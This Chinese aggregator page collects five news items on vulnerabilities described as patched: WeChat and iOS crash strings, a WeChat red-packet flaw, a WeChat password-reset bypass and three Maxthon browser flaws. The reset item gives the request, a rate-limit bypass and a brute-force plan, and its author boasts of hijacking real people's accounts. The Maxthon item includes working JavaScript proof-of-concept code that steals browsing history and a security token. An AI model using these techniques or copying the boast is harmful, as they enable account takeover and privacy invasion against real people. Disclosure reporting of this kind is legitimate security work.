51阅读吧 - 为您打造专业优质的文章分享平台!
您的当前位置: 51阅读吧 >

已修复短信字符崩溃漏洞|微信回应手机崩溃BUG:正在紧急修复 不要乱试

NO.1 微信回应手机崩溃BUG:正在紧急修复 不要乱试

  全网营销推广 A5营销双节大优惠

  有多位网友反馈,使用微信安卓版,如果发送“任意两位数数字+15个中文句号”,然而再进入聊天界面,会出现卡死的情况,微信提示崩溃,需要等待或关闭应用,而且发送信息和收到信息的安卓手机都会中招。

  有网友表示,该问题的解决办法是,重启微信,删除导致崩掉的那个聊天窗口,即可恢复正常,但这意味着聊天记录也会被删除。

  

 

  据网友亲测……华为、三星、魅族、OPPO、小米都会出现此问题。

  随后,腾讯官方号在知乎上做出了明确回应。

  

 

  原文如下:

  这两天,有部分用户在使用微信6.5.13 Android版的过程中,发现输入两个数字加15个句号,就会出现手机卡顿的情况。目前,该问题正在紧急修复中,请各位不要因为好奇随便尝试。。。此问题出现的背景是,微信6.5.13 Android版对文字排版功能进行了优化,以使会话的长文本在显示对齐时比系统默认排版更为美观。在此过程中,出现了意外BUG,导致了这次显示特定内容时微信卡顿的问题。由此给大家带来的不便,我们深感歉意,也感谢大家的支持与谅解。温馨再提醒一次,请各位不要乱试bug。

  可以看到,此BUG的出现是微信版本的问题,与手机机型无关,而目前问题正在紧急修复中。

NO.2 微信任意用户密码修改漏洞(已修复)

今天发现个微信群发的漏洞.还没玩.就被修补了.
于是就有了这个漏洞的产生.
同样问题产生在重置用户密码的环节.
在微信官方的首页上发现新增了如下功能模块


访问后看到这个功能.来了兴趣,www.2cto.com


在这个页面输入一个已经注册了微信的手机号.


得到如下提示


选择我已收到验证码就跳转到一个修改密码的页面,如下


在这一步抓包.得到如下包文

check=false&phone=18666666666&t=w_password_phone&isemail=0&value=18666666666&method=reset&country=A86&getmethod=web&password=zzzzzz&password2=zzzzzz&verifycode=1234

将包文中的verifycode进行重复提交后发现会提示


这样的话.就要想办法去突破.
经过一系列尝试后发现如果在phone=18666666666的号码后面添加不为数字的字符时,可以绕过此限制.于是推理出其判断方法
如果phone=18666666666的尝试次数大于阀值,则提示请求过于频繁
但在这一步之前没有对phone进行提纯.所以可以将特殊字符带入
但在下一步的时候进行了提纯.只取了phone中的数字部分.
然后在取出此号码的verifycode进行比对.
比对成功则修改密码


修改密码成功.
这个地方的薄弱环节在于微信重置密码的验证码为4-5位纯数字.
且数字范围在1000-20000之间
也就是说.我只要尝试19000次.我用50个线程发包.3分钟即可成功修改一个密码.

在发现此漏洞后.我修改了两个人的微信帐号.
一个是最近很喜欢的明星柳岩的经纪人
柳岩在微搏上公布了经纪人的手机号.
成功修改进入后.通过微信自带的离线消息查看功能.可以成功查看其所有QQ好友
于是得到了柳岩的QQ号..但是拒绝添加好友了..伤心
这里由于隐私原因.就不上图了.

另外一个是腾讯的某高管.我在百度上搜索到了腾讯高管的list
然后通过list里的手机号修改了其密码.和尊敬的马化腾马大哥进行了一次亲密的交谈.
由于夜深了.他不在线.所以没收到其回应.附图几张.

和马哥开了个小玩笑.

然后找到了最近正好很火的周鸿祎手机泄漏的视频.
同样通过音频分析得到号码.尝试修改其微信密码..
发现周哥果然没有注册微信.放弃了尝试

NO.3 iOS神秘字符发生系统崩溃BUG正式被修复

今年5月下旬,不少iPhone用户发现包括iOS 8.3在内的多个版本iOS系统都因为接收一段“神秘字符”而发生系统崩溃。

之后,苹果官方确认了这一BUG的存在并给出了临时解决方案。

现在,随着昨日早些时候iOS 8.4 Beta 4的到来,上述由Unicode特定字符串所触发的BUG也宣告被修复。

按计划,苹果将于今年6月30日推出iOS 8.4正式版,内建刚刚发布不久的Apple Music流媒体音乐服务。

NO.4 遨游已经修复的三个安全漏洞分析

在80sec通知遨游存在的安全漏洞之后,遨游于6.30号发布了新版的浏览器,修复了前面提到的安全漏洞,具体更新可以见http://blog.maxthon.cn/,此次更新修复了三个安全问题,主要的问题细节如下: 漏洞来源:http://www.80sec.com/release/maxthon-vulns-poc.txt 1 浏览器内核漏洞导致的本地跨域漏洞 漏洞说明:maxthon采用了系统的IE内核,但是该内核可能存在一些安全漏洞导致跨域攻击,而遨游的max:等的域是在本地等同于file://,所以这个跨域攻击将导致在本地上下文中执行javascript代码,这里只给出取得遨游浏览历史记录的POC。 漏洞POC: <a href="">Maxthon Exploit</a>
<script>
function win(){
x=window.open("max:history");
setTimeout(function(){
x.location=new String("javascript:x=maxHistory.history.list.site.loadData();for(i=0;i<x.length;i ) document.write(x[i].site ”<br>”);”)
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i ) {
document.links[i].href=”javascript:win()”
}
}
</script>
漏洞修复:在IE内核修复之前,遨游新版本已经修复这个安全漏洞 2 遨游安全中心漏洞导致的远程修改任意用户设置 漏洞说明:遨游对IE内核的一些特性并不是十分了解,导致在处理一些特殊情况时出现安全漏洞。遨游的控制中心实际上就是一组HTML JAVASCRIPT,通过这些页面可以读取敏感数据,修改浏览器设置,下载文件等等。当然,遨游也有自己的安全策略,将那些HTML文件放到外部站点上并不能直接调用,因为遨游有一个安全控制策略,security.src,这个文件代码如下:
var max_security_id=''; var url=String(document.location).toLowerCase(); if(url.indexOf('file://')>-1&&url.indexOf('http://')==-1&&url.indexOf('https://')==-1){ max_security_id='{B73B3AC9-B009-4429-AE67-514332D791FE}'; }else{ document.location='about:blank'; } 其中max_security_id是遨游在调用各种控件时必须的一个参数,这个参数在各个功能里是必须的,各个机器的max_security_id并不相同。如果我们能取得这个max_security_id那么就可以在远程任意站点调用遨游的各种功能譬如设置,读取敏感数据甚至是远程代码执行了。 首先,这个max_security_id每次启动貌似都会更改,这个max_security_id会存储在安装目录的template/security.src里,而我们可以在自己的站点页面里做如下调用:
<script src="E:Program FilesMaxthon2templatesecurity.src"></script>
<script src="d:Program FilesMaxthon2templatesecurity.src"></script>
<script src="c:Program FilesMaxthon2templatesecurity.src"></script>
别意外,遨游是允许做这样调用本地文件的:),但是security.src也是有限制的,只有当location里包含file:///并且不包含http://和https:///的时候才会赋值,否则会跳转。这里遨游有个错误就是黑名单策略导致可以使用譬如ftp://的协议饶过,至于想包含file://也很简单:
ftp://www.foo.com/exploit.html#file://80sec.com
这样一个地址实际访问的是exploit.html,但是location却包含file://,安全策略被饶过,可以取得max_security_id,然后利用取得的max_security_id可以做一切操作。 漏洞POC: 搭建一个匿名ftp服务器www.foo.com,然后在恶意站点做如下引用:
<iframe src="ftp://www.foo.com/history/index.htm#file:///www.80sec.com" width=100% height=100%>
/history/index.htm为放在www.foo.com上的精心构造的exploit,最简单的方式就是将官方安装目录里的template里的history等子目录下面的index.html里的
<script type="text/javascript" src="../security.src"></script>
换成
<script src="E:Program FilesMaxthon2templatesecurity.src"></script>
<script src="d:Program FilesMaxthon2templatesecurity.src"></script>
<script src="c:Program FilesMaxthon2templatesecurity.src"></script>
通过修改里面的index.htm内容就可以修改浏览器设置,读取历史记录等等 漏洞修复:新版本将代码修正为
var max_security_id=''; if(String(window.document.location).toLowerCase().indexOf('file://')==0){ max_security_id='{02E14D94-53C8-4B6D-89AE-755DC5299C6C}'; }else{ document.location='about:blank'; }
限定只能本地文件能引用这个js,修复了这个问题。 3 RSS订阅跨站脚本漏洞 漏洞说明:遨游在实现rss功能时存在问题,导致在访问有问题的页面时会出现xss漏洞 漏洞POC:订阅http://www.80sec.com/feed就可以看到效果:) 漏洞修复:新版本已经修复 Maxthon对待漏洞的态度非常严谨,希望Maxthon用户尽快升级到新版.

NO.5 微信红包被曝存高危漏洞 现已修复

微信红包有漏洞?黑客可以随意窃取他人的红包?其实这个是微信红包的漏洞,在用户发红包期间,黑客可以越权抢到其他用户发的红包,红包秒到账,这样的漏洞对大家还是有一定损失的。

3月5日消息,乌云漏洞平台今日发布最新高危漏洞,称有乌云白帽发现微信红包存在高危漏洞,可越权抢到其他用户发的红包。目前该漏洞已获腾讯确认,正在与业务部门进行沟通制定解决方案。

乌云漏洞平台显示,白帽黑客only-guest发现了微信红包的高危漏洞,网络黑客可以绕过权限,通过设计自动程序来随意窃取他人红包,用户存在遭受财务损失风险。

根据该白帽黑客公布的详细说明,经其测试,一分钟内领取了200多元红包。

乌云漏洞平台显示,该漏洞细节已于1月9日通知厂商,等待处理。腾讯方面回复称:“这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。”

小编点评:

大家可以看到这已经是2个月以前的消息,微信也表示并没有造成任何的损失,目前该漏洞早已修复,大家不必担心。

上一篇:微信智慧工坊餐饮+小程序专场|用餐饮小程序解决餐饮行业常见痛点 上一篇:关于家庭的名言警句|关于艺术家的名言名句
与该文相关的文章

温馨提示:如果您对51阅读吧有任何建议,请通过网站联系邮箱向我们反馈,感谢各位的建议与支持!